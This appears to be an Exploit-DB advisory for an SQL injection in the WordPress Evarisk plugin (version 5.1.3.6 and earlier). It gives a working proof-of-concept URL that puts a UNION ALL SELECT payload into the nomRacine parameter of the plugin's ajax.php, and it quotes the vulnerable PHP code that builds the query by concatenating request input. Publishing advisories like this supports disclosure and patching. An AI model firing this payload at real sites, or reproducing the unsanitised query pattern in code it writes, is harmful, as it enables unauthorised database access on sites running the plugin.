WordPress Evarisk plugin <= 5.1.3.6 - SQL Injection Vulnerability

2011-08-28T00:00:00
ID EDB-ID:17738
Type exploitdb
Reporter Miroslav Stampar
Modified 2011-08-28T00:00:00

Description

WordPress Evarisk plugin <= 5.1.3.6 - SQL Injection Vulnerability. Webapps exploit for php platform

                                        
                                            # Exploit Title: WordPress Evarisk plugin &lt;= 5.1.3.6 SQL Injection Vulnerability
# Date: 2011-08-28
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/evarisk.5.1.3.6.zip
# Version: 5.1.3.6 (tested)
# Note: magic_quotes has to be turned off

---
PoC
---
http://www.site.com/wp-content/plugins/evarisk/include/ajax.php?post=true&act=reloadCombo&table=wp_eva__veille_groupe_question&nomRacine=-1" UNION ALL SELECT 1,@@version,3,4,5,6,7--%20

---------------
Vulnerable code
---------------
if($_REQUEST['post'] == 'true')
{
    if(isset($_REQUEST['act']))
    {
        switch($_REQUEST['act'])
        {
            ...
            case 'reloadCombo':
                $racine = $wpdb-&gt;get_row( 'SELECT * FROM ' . TABLE_GROUPE_QUESTION . ' where nom="' . $_REQUEST['nomRacine'] . '"');